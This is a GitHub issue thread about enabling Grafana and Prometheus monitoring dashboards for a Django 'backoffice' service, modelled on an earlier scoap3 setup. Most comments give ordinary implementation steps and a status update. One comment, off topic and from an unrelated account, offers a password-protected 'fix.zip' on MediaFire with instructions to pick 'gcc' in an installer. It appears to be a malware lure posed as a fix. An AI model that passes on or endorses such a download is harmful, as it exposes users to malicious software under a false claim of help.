### ISSUE TITLE
enable grafana monitoring in backoffice

### ISSUE THREAD

**Issue by drjova** [cern-sis/issues-inspire#552]
In scoap3 we added prometheus django dashboards in Grafana. We have to do similar dashboards to backoffice. The link to the dashboards is [here](https://grafana.siscern.org/dashboards/f/2T8kLJgSk/scoap3).

Please note that scoap3 stopped working.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PascalEgn** [comment]
1. Add https://github.com/korfuri/django-prometheus to backoffice (see https://github.com/SCOAP3/scoap3/commit/67d0214f1a6c78c1faf2c2407c3569eeccbbd83c for infos about scoap3 implementation)

2. Add the following dashboards to Grafana k8s setup (see https://github.com/cern-sis/kubernetes/commit/32422af7b8db5a7942e143cd43258a1739cece91 and https://github.com/cern-sis/kubernetes/commit/28ebcbe0b4cdf3aed32eaa4e35062ce52d539b42 for details):
   * https://grafana.com/grafana/dashboards/17617-django-overview/
   * https://grafana.com/grafana/dashboards/17616-django-requests-overview/
   * https://grafana.com/grafana/dashboards/17613-django-requests-by-view/

3. Enjoy some metrics on https://grafana.siscern.org/

**Comment by DonHaul** [comment]
Most/alls of the configuration has already been done https://github.com/inspirehep/backoffice/pull/15
Awaiting for jimil to create a prometheus and a grafana instances in the `kubernetes-inspire` cluster
